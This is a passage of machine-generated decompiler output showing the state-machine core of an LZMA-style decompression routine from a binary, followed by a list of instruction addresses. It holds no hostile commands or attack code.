							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406398
0x00406398
0x0040639c
0x00406453
0x00406456
0x00406462
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x004063a2
0x004063a6
0x004068e7
0x004068e7
0x004068ea
0x004068ee
0x004068ee
0x004063ac
0x004063b2
0x004063b5
0x004063b9
0x004063bc
0x004063c0
0x00406886
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x00000000
0x004068e3
0x004063c6
0x004063c9
0x004063cf
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x004063fa
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
